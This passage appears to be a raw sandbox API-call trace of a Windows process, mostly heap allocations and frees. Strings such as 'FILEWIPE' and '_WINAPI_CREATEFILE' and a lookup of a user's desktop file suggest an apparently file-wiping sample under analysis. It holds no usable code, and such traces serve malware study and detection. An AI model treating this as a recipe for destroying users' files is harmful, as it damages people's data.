(in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0168.577] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.577] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.577] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ad310, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x5571c040, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0x5571c040, ftLastWriteTime.dwHighDateTime=0x1d5de91, nFileSizeHigh=0x0, nFileSizeLow=0x7952, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_IlnDJr.mp4", cAlternateFileName="")) returned 0x90af58 [0168.578] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.578] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.578] CharLowerBuffW (in: lpsz="byte[31058]", cchLength=0xb | out: lpsz="byte[31058]") returned 0xb [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0168.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0168.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.580] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.580] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.580] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.581] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.582] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0168.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0168.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.583] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.584] FreeLibrary (hLibModule=0x75c90000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.585] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.585] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0168.586] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0168.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.586] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0168.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0168.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0168.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0168.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0168.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0168.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.588] RtlAllocateHeap 